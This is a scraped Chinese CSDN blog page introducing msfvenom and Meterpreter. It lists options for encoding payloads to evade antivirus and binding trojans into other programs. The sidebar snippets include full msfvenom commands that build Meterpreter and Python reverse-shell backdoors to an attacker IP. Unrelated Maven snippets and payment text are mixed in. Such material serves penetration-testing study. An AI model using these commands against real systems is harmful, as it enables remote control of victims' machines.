MSF之Msfvenom+Meterpreter

最新推荐文章于 2024-07-03 18:59:45 发布
最新推荐文章于 2024-07-03 18:59:45 发布
阅读量4.1k 收藏 31
点赞数 4
分类专栏: 内网渗透
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/csacs/article/details/99337728
版权
本文介绍了如何使用MSFvenom生成各种版本的木马程序,并通过Meterpreter进行后渗透攻击。通过设置路由和使用代理,可以访问内网其他网段,同时讨论了创建持久性后门的方法。
摘要由CSDN通过智能技术生成

MSF之Msfvenom+Meterpreter

太极生两仪,两仪生四象,
四象生八卦,八卦衍万物。
然后呢?
万物不如你!

Msfvenom:

msfvenom是msfpayload,msfencode的结合体,它的优点是单一命令行和效率.利用msfvenom生成各种版本木马程序,并在目标机上执行,在本地监听上线,执行攻击。

Options:
-p, --payload 指定需要使用的payload。使用自定义的payload,请使用-;或者stdin指定
-l, --list  列出指定模块的所有可用资源. 模块类型包括: payloads, encoders, nops, all
-n, --nopsled 为payload预先指定一个NOP滑动长度
-f, --format  指定输出格式
-e, --encoder 指定需要使用的编码
-a, --arch 指定payload的目标架构 x64 x86
–platform 指定payload的目标平台
-s, --space 设定有效攻击荷载的最大长度
-b, --bad-chars 设定规避字符集,比如: & #039;\x00\xff& #039;
-i, --iterations 指定payload的编码次数,绕杀毒
-c, --add-code 指定一个附加的win32 shellcode文件
-x, --template  指定一个自定义的可执行文件作为模板
-k, --keep 保护模板程序的动作,注入的payload作为一个新的进程运行
–payload-options 列举payload的标准选项
-o, --out  保存payload
-v, --var-name 指定一个自定义的变量,以确定输出格式
–shellest 最小化生成payload

最常使用的也就是 –f –o –p –I –e -x
-f (msfvenom –format查看)也就是指定生成文件格式,如图
在这里插入图片描述在这里插入图片描述

-o 输出位置,在捆绑木马时候,可以重定向。
-p 使用哪个payload
-i 把payload编码几次,次数越多免杀效果提高,随之失效性也变大
-e 使用哪个编码进行混淆免杀
-x 捆绑也做好的木马,-o只定被捆绑软件
查看可以利用的payload(编码/所有)
msfvenom -l payloads(encoders /all)

最低0.47元/天 解锁文章
SoulCat.
关注
专栏目录
2021-08-19 msfvenom+meterpreter
白嫖怪的博客
08-19 397
MSF-Msfvenom +Meterpreter //稍微学习一会,然后就去睡觉 Msfvenom: msfvenommsfpayload,msfencode 的结合体,它的优点就在于能执行单一命令,利用 msfvenom 生成各种版本木马程序,并在目标机上执行,在本地监听上线,执行攻击。 Options: -p, --payload 指定需要使用的payload。使用自定义的payload,请使用- ; 或者stdin指定 -l, --list 列出指定模块的所有可用资源. 模块类型包括: pa
c语言msf,Metasploit应用笔记-msfvenom生成meterpreter后门代码
weixin_34564735的博客
05-21 774
1 用msfvenom生成c语言格式的shellcode. windows/meterpreter/reverse_http是shellcode, X86/shikata_ga_nai是指定对shellcode的编码方法,-i 3 是指定编码次数,LHOST LPORT是shellcode要使用的参数,表示shellcode运行是连接的IP地址和端口。-f c 指定shellcode的c语言格式。...
利用msfvenom制作windows木马及免杀马
最新发布
aheyor的博客
07-03 968
注意:linux可以ping通windows,但是windowsping不通linux,查看linux的网关,然后将windows的网关和linux网关配置一致即可相互ping通。原文链接:https://blog.csdn.net/qq_43332640/article/details/124072802。第四步:将生成的捆绑木马发到windows主机,并且打开msf的监听模块。第二步:打开kali启动msfvenom,制作木马。第三步:木马捆绑,(主程序启动之后子程序随之启动)
maven项目打war包
Handsome丶Boy
03-19 106
    maven项目打war包总结下 1.eclipse插件打包(package)  点击看看 这篇文章讲的很详细,再次不赘述 2.命令行打包(mvn package) 看看这篇文章 3.eclipse进行普通的打包 export---war ...
Msfvenom-命令-总结大全--
爱我非你莫属的博客
10-05 1695
Msfvenom命令 -p (–payload-options) 添加载荷payload。 载荷这个东西比较多,这个软件就是根据对应的载荷payload生成对应平台下的后门,所以只有选对payload,再填写正确自己的IP,PORT就可以生成对应语言,对应平台的后门了!!! (- -payload-options 列出payload选项) -l 查看所有payload encoder nops。 -f (–help-formats) 输出文件格式。 (- -hel
maven 打war包
蜗牛爬行的博客
01-22 492
配置 你的pom.xml文件,在你的overview视窗里 配置 packaging为 war 然后 然后点击 pom.xml右键,run as 选择 install 或是 package 如果项目没问题,配置没问题 就会在项目的target 的目录里生成 war文件,   作为笔记,一下只针对本项目 替换images下所有文件
msfmsfvenom的使用—使用Kali渗透工具生成远控木马
GUN_C的博客
11-15 4012
msfvenom的使用
msf+mysql+弱口令爆破_内网渗透 | 手把手教你如何进行内网渗透
weixin_42347357的博客
01-27 1492
文章目录结构0x01 DMZ渗透首页看到DMZ开启了web服务,是一个typecho的cms,后台默认就是/admin后台尝试爆破弱口令admin1234但是找了一圈并没有发现有什么可以利用的,网上有一个反序列化的洞可以用。exp上面呢,就是利用exp将一句话写入当前目录的shellx.php中。get shell到这里呢,想了想我们的目标是内网,并且防火墙没开,就不考虑提权了。0x02 跳板及内...
python调用msf_MSF利用python反弹shell-Bypass AV
weixin_39883079的博客
11-30 1622
本文主要介绍两种利用msf生成python版 payload,并利用Py2exe或PyInstaller将python文件转为exe文件,可成功bypass某些AV反弹shellmsf-python反弹shell姿势11) msfvenom生成python后门msfvenom -p python/meterpreter/reverse_tcp LHOST=192.168.20.131 LPORT=...
msfvenom手册
xxx9686的博客
09-17 518
基于各类web脚本,对于此类的web脚本触发执行方法非常简单,直接在url中访问该脚本即可。基于其它各类脚本的payload,说几个实战中可能会碰到的语言环境。
后门战神,Msfvenom教程
大河之犬的博客
12-27 1061
Msfvenom主要用来生成带后门的软件MsfvenomMsfpayload和Msfencode的组合,将这两个工具都放在一个Framework实例中。自2015年6月8日起,msfvenom替换了msfpayload和msfencodewindows的安装很简单,直接运行安装文件即可,验证安装:接着输入msfconsole会提示你是否建立一个数据库:大功告成!
通过Maven远程部署war包
qq_44929168的博客
06-06 423
使用 Maven 进行远程部署和热部署到 Tomcat 服务器,可以通过 Maven 插件来实现。以下是使用插件的详细步骤。
msfvenom常用payload
ITgougou_的博客
12-24 441
payload命令 windows: msfvenom-a x86 --platform Windows -p windows/meterpreter/reverse_tcp LHOST= 攻击机IP LPORT=攻击机端口 -e x86/shikata_ga_nai -b '\x00\x0a\xff' -i 3 -f exe -o payload.exe mac: msfvenom-...
Metasploit应用笔记-msfvenom生成meterpreter后门代码
热门推荐
oneVs1的专栏
02-28 1万+
1 用msfvenom生成c语言格式的shellcode. windows/meterpreter/reverse_http是shellcode, X86/shikata_ga_nai是指定对shellcode的编码方法,-i 3 是指定编码次数,LHOST LPORT是shellcode要使用的参数,表示shellcode运行是连接的IP地址和端口。-f c 指定shellcode的c
熟悉msfvenom生成木马程序过程,并执行和监听控制.
suixinxxx的博客
11-04 3377
一,目的:熟悉msfvenom生成木马程序过程,并执行和监听控制. 二,工具:MSF 三,原理:msfvenommsfpayload,msfencode的结合体,它的优点是单一,命令行,和效率.利用msfvenom生成木马程序,并在目标机上执行,在本地监听上线 四,过程: 1,查看帮助 命令: root# msfvenom -h 结果: 2,生成
metasploit之msfvenom
Yale的博客
01-31 2494
先来看看msfvenom的帮助菜单 我们先来看一个示例 使用Msfvenom生成一个windows下的绑定shell的shellcode,使用shikata_ga_nai编码器,迭代编码了三次,过滤了null字符,使用python格式 我们可以使用-platform指定很多平台,上面的例子指定的是windows下的,我们同样也可以指定cisco,os x,solaris,bsd等 使用—hel...
内网代理技术总结
m0_66458291的博客
04-17 895
我们可以使用msf的auxiliary/server/socks_proxy模块和cs的建立sock连接模块来建立,建立好连接之后我们将其中的ip和端口信息配置到代理转发软件中,然后将我们的渗透工具添加到代理工具中就可以实现在我们本机对于内网不出网的主机进行测试
kali的msfvenom
07-27
kali的msfvenom是一个Metasploit的独立后门生成器,也是msfpayload和msfencode的替代品。它可以用来生成各种类型的后门,包括Windows平台上的meterpreter反向TCP连接后门。使用msfvenom可以通过指定参数来生成特定类型的后门,并将其保存为可执行文件。例如,可以使用以下命令生成一个meterpreter反向TCP连接后门,并将其保存为名为mymalware.exe的可执行文件:msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.17.129 lport=6789 -f exe > mymalware.exe。\[1\]\[2\]\[3\] #### 引用[.reference_title] - *1* [Kali利用msf渗透Windows电脑(超详细)](https://blog.csdn.net/RFZ_322/article/details/123367668)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v91^insert_down28v1,239^v3^insert_chatgpt"}} ] [.reference_item] - *2* *3* [[Kali]--Msfvenom](https://blog.csdn.net/weixin_42633229/article/details/109535621)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v91^insert_down28v1,239^v3^insert_chatgpt"}} ] [.reference_item] [ .reference_list ]
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值